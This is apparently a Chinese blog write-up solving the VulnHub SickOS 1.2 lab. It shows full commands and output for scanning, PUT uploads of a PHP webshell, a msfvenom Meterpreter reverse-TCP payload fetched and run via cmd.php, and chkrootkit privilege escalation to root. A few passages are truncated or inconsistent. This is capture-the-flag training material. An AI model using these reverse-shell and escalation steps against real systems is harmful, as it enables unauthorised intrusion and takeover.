如何获取SickOS 1.2 Flag
admin
2023-01-30 13:46:09
0次
实验环境如下:
基本思路:
Network Scanning (网络扫描 Netdiscover, Nmap)
Directory brute-force (网站目录扫描 dirb)
Find HTTP Options: PUT (查找HTTP选项 curl)
Generate PHP Backdoor (生成php后门 Msfvenom)
Upload and execute a backdoor(上传php后门)
Reverse connection (Metasploit)
Privilege Escalation (cron job)
Import python one-liner for proper TTY shell
Get Root access and capture the flag.
1)Network Scanning (网络扫描 Netdiscover, Nmap)
root@host06:~# nmap -sV -T4 -A 192.168.32.169 Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-21 19:19 CST Nmap scan report for 192.168.32.169 Host is up (0.00085s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) | http-robots.txt: 5 disallowed entries |_/ange1 /angel1 /nothing /tmp /uploads |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Dina MAC Address: 00:0C:29:29:82:CE (VMware) Device type: general purpose Running: Linux 2.6.X|3.X OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 OS details: Linux 2.6.32 - 3.5 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.85 ms 192.168.32.169 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.13 seconds
从上面扫描可以看出,主机只开放了如下服务与端口:
SSH (22/tcp) - OpenSSH 5.9p1 Debian
HTTP (80/tcp) - Lighttpd 1.4.28
2) 使用dirb 扫描网站目录
root@host06:~# dirb http://192.168.32.169 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Jun 21 19:25:51 2019 URL_BASE: http://192.168.32.169/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.32.169/ ---- + http://192.168.32.169/index.php (CODE:200|SIZE:163) ==> DIRECTORY: http://192.168.32.169/test/ ---- Entering directory: http://192.168.32.169/test/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Fri Jun 21 19:26:01 2019 DOWNLOADED: 4612 - FOUND: 1
使用niko 扫描时发现"The X-Content-Type-Options header is not set",
root@host06:~# nikto -h http://192.168.32.169 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.32.169 + Target Hostname: 192.168.32.169 + Target Port: 80 + Start Time: 2019-06-21 19:34:28 (GMT8) --------------------------------------------------------------------------- + Server: lighttpd/1.4.28 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + All CGI directories 'found', use '-C none' to test none + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21 + 26545 requests: 0 error(s) and 4 item(s) reported on remote host + End Time: 2019-06-21 19:37:21 (GMT8) (173 seconds)
再次使用curl -v -X OPTIONS http://192.168.32.169/test测试,确认可以"put"等方法来进行注入
root@host06:~# curl -v -X OPTIONS http://192.168.32.169/test * Expire in 0 ms for 6 (transfer 0x5588c3fe4d00) * Trying 192.168.32.169... * TCP_NODELAY set * Expire in 200 ms for 4 (transfer 0x5588c3fe4d00) * Connected to 192.168.32.169 (192.168.32.169) port 80 (#0) > OPTIONS /test HTTP/1.1 > Host: 192.168.32.169 > User-Agent: curl/7.64.0 > Accept: */* > < HTTP/1.1 301 Moved Permanently < DAV: 1,2 < MS-Author-Via: DAV < Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK < Location: http://192.168.32.169/test/ < Content-Length: 0 < Date: Fri, 21 Jun 2019 15:16:48 GMT < Server: lighttpd/1.4.28 < * Connection #0 to host 192.168.32.169 left intact
使用curl的put方法上传一个文件 curl -v -X PUT -d 'I am a boy' http://192.168.32.169/test/test.txt
root@host06:~# curl -v -X PUT -d 'I am a boy' http://192.168.32.169/test/test.txt * Expire in 0 ms for 6 (transfer 0x560c4ca07d00) * Trying 192.168.32.169... * TCP_NODELAY set * Expire in 200 ms for 4 (transfer 0x560c4ca07d00) * Connected to 192.168.32.169 (192.168.32.169) port 80 (#0) > PUT /test/test.txt HTTP/1.1 > Host: 192.168.32.169 > User-Agent: curl/7.64.0 > Accept: */* > Content-Length: 10 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 10 out of 10 bytes < HTTP/1.1 201 Created < Content-Length: 0 < Date: Fri, 21 Jun 2019 15:22:00 GMT < Server: lighttpd/1.4.28 < * Connection #0 to host 192.168.32.169 left intact
使用相同的方法可以上传一个php调用shell命令的函数 curl -X PUT -d '
root@host06:~# curl -X PUT -d '生成反弹shell脚本并上传
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.10 lport=443 -f raw > put01.php (备注:这里端口使用443目的是绕过防火墙)
root@host06:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.10 lport=443 -f raw > put01.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 1113 bytes上传文件方法1:利用原来上传的调用系统cmd命令方法
起动一个python的临时web测试服务器,提供给客户端下载内容。python -m SimpleHTTPServer 443 (备注:此使用443端口绕过防火墙)
并且执行: curl "http://192.168.32.169/test/cmd.php?cmd=wget%20http://192.168.32.10:443/put01.php" 以下载put01.php文件
root@host06:~# python -m SimpleHTTPServer 443 Serving HTTP on 0.0.0.0 port 443 ... 192.168.32.169 - - [21/Jun/2019 20:09:25] "GET /put01.php HTTP/1.1" 200 -上传文件方法2: 使用curl --upload-file
root@host06:~# curl --upload-file put02.php -v --url http://192.168.32.169/test/put02.php -0 --http1.0 * Expire in 0 ms for 6 (transfer 0x55e395728d00) * Trying 192.168.32.169... * TCP_NODELAY set * Expire in 200 ms for 4 (transfer 0x55e395728d00) * Connected to 192.168.32.169 (192.168.32.169) port 80 (#0) > PUT /test/put02.php HTTP/1.0 > Host: 192.168.32.169 > User-Agent: curl/7.64.0 > Accept: */* > Content-Length: 111 > * We are completely uploaded and fine * HTTP 1.0, assume close after body < HTTP/1.0 201 Created < Content-Length: 0 < Connection: close < Date: Sat, 22 Jun 2019 00:12:16 GMT < Server: lighttpd/1.4.28 < * Closing connection 0启动msfconsole 并设定如下相关参数,然后执行curl "http://192.168.32.169/test/put01.php"(即查执行刚上传的shell)
root@host06:~# msfconsole _---------. .' ####### ;." .---,. ;@ @@`; .---,.. ." @@@@@'.,'@@ @@@@@',.'@@@@ ". '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' "--'.@@@ -.@ @ ,'- .'--" ".@' ; @ @ `. ;' |@@@@ @@@ @ . ' @@@ @@ @@ , `.@@@@ @@ . ',@@ @ ; _____________ ( 3 C ) /|___ / Metasploit! \ ;@'. __*__,." \|--- \_____________/ '(.,...."/ =[ metasploit v5.0.28-dev ] + -- --=[ 1897 exploits - 1068 auxiliary - 329 post ] + -- --=[ 547 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.32.10 lhost => 192.168.32.10 msf5 exploit(multi/handler) > set lport 443 lport => 443 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.32.10:443 [*] Sending stage (38247 bytes) to 192.168.32.169 [*] Meterpreter session 1 opened (192.168.32.10:443 -> 192.168.32.169:49617) at 2019-06-21 20:16:00 +0800 meterpreter > shell Process 28313 created. Channel 0 created. id uid=33(www-data) gid=33(www-data) groups=33(www-data) cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # chkrootkit -V chkrootkit version 0.49 ^Z Background channel 0? [y/N] y meterpreter > Background session 1? [y/N] y [-] Unknown command: y.返回msfconsole控制台,检查chkroot的漏洞,并利用此漏洞进行***测试
msf5 exploit(multi/handler) > search chkroot Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/local/chkrootkit 2014-06-04 manual Yes Chkrootkit Local Privilege Escalation msf5 exploit(multi/handler) > use exploit/unix/local/chkrootkit msf5 exploit(unix/local/chkrootkit) > show options Module options (exploit/unix/local/chkrootkit): Name Current Setting Required Description ---- --------------- -------- ----------- CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit SESSION yes The session to run this module on. Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(unix/local/chkrootkit) > set session 1 session => 1 msf5 exploit(unix/local/chkrootkit) > set lport 8080 lport => 8080重新进行***测试
msf5 exploit(unix/local/chkrootkit) > run -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP double handler on 192.168.32.10:8080 msf5 exploit(unix/local/chkrootkit) > [!] Rooting depends on the crontab (this could take a while) [*] Payload written to /tmp/update [*] Waiting for chkrootkit to run via cron... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo tnDOwZeHQZJPT8fE; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "tnDOwZeHQZJPT8fE\r\n" [*] Matching... [*] B is input... [*] Command shell session 2 opened (192.168.32.10:8080 -> 192.168.32.169:33664) at 2019-06-21 19:01:31 +0800 [+] Deleted /tmp/update msf5 exploit(unix/local/chkrootkit) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter php/linux www-data (33) @ ubuntu 192.168.32.10:443 -> 192.168.32.169:49613 (192.168.32.169) 2 shell cmd/unix 192.168.32.10:8080 -> 192.168.32.169:33664 (192.168.32.169) msf5 exploit(unix/local/chkrootkit) > sessions -i 2 [*] Starting interaction with 2... whoami root id uid=0(root) gid=0(root) groups=0(root) python -c 'import pty;pty.spawn("/bin/bash")' root@ubuntu:~# cd /root cd /root root@ubuntu:~# ls ls 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz chkrootkit-0.49 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt newRule root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually. Thanks for giving this try. @vulnhub: Thanks for hosting this UP!.
下一篇:华为防火墙双向NAT配置
相关内容
热门资讯
德国总理:美国正在被伊朗羞辱
德国之声4月27日报道,德国总理默茨在访问一所学校时表示,在当前的持续冲突中,伊朗领导层正试图羞辱美...
理响中国|“长”歌以行,风云激...
光阴如梭,东方潮阔。这里是中国的长三角,世界的长三角。无论过去、现在还是未来,这片土地都因时代而生,...
白宫:特朗普及其国安团队开会讨...
新华社华盛顿4月27日电 美国白宫新闻秘书莱维特27日在记者会上证实,总统特朗普及其国家安全团队当天...
人民日报刊文:日本放开杀伤性武...
日本放开杀伤性武器出口推高地缘冲突风险(国际论坛)常思纯《人民日报》(2026年04月28日 第 0...
医疗保障法草案二审:明确生育保...
满足多样化健康保障需求本报记者 彭 波4月27日,医疗保障法草案二审稿提请十四届全国人大常委会第二十...
天津一景区发生自转旋翼机事故1...
澎湃新闻记者 吕新文中国民用航空华北地区管理局4月22日公布《豪客通航“10•1”天津长芦汉盐旅游区...
卡塔尔埃米尔与美国总统特朗普通...
当地时间24日,卡塔尔埃米尔塔米姆与美国总统特朗普通电话,重点就中东地区局势以及伊朗与美国谈判问题交...
男子30年前被扣押2859克黄...
澎湃新闻记者 王鑫家住辽宁省大连市的潘永嘉近日向澎湃新闻反映称,三十年前,他在大连周水子机场被盖州市...
商务部:取消反制欧盟两家金融机...
中华人民共和国商务部令二〇二六年 第1号鉴于欧盟已取消对中国两家金融机构的制裁措施,现公布《关于取消...
过去24小时共有5艘船只通过霍...
总台记者当地时间24日获悉,过去24小时内,共有5艘船只通过霍尔木兹海峡,其中包括一艘伊朗油轮。(总...